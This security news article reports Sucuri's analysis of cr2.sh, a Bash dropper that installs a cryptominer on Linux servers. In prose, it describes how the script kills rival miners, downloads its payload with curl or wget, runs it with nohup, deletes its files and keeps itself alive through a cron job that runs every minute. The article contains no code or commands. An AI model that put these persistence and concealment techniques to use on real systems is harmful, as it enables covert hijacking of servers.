Sucuri researchers just reported that someone got in touch with them regarding “a malicious process they had discovered running on their web server”. The process in question was quite heavy on the CPU, pointing to a cryptominer process running in the background.
During their analysis, the researchers were able to determine that the cryptominer was downloaded via a Bash script known as cr2.sh, which is dropped on the server in an unknown way.
What happens after the bash file is executed? It is set to kill processes from a list of process names which is related to the cryptomining, such as xmrig and cryptonight, among others.
It then checks to see whether the malicious process is already running and sends a request to a PHP file hosted on a separate server. This file outputs the IP address that grabs the actual cryptominer content run by the malicious process.
More about the cr2.sh bash script
The cr2.sh script also needs to determine whether the OS environment is 32- or 64-bit in order to download the cryptomining payload. To do this it utilizes the curl or wget command as /tmp/php, while the miner’s configuration file is downloaded from the same server, the researchers explained.
The script has now downloaded to the web server all of the necessary content to go ahead and spawn the process using nohup, which allows the process to continue running regardless if the user ends their bash session.
In its next phase, the miner process now loaded in the Linux host’s memory will delete the payload as well as its configuration file. This is done to secure and conceal its presence.
The malware is also capable of achieving persistence by creating a cron job that is set to run every minute. In addition, it will check for the the cr2.sh Bash script, and if the script is missing, it will re-download and execute it once again:
Just in case someone detects the process and kills it along with the initial cr2.sh file, the file creates a cronjob (unless it exists already). This cron is scheduled to run every minute, re-download the cr2.sh file if it is missing, and execute the malicious bash script.
Note that not only web servers are targeted by this attack but also desktop installations of 32/64bit Linux systems, and other variants, deployed to infect Windows installations.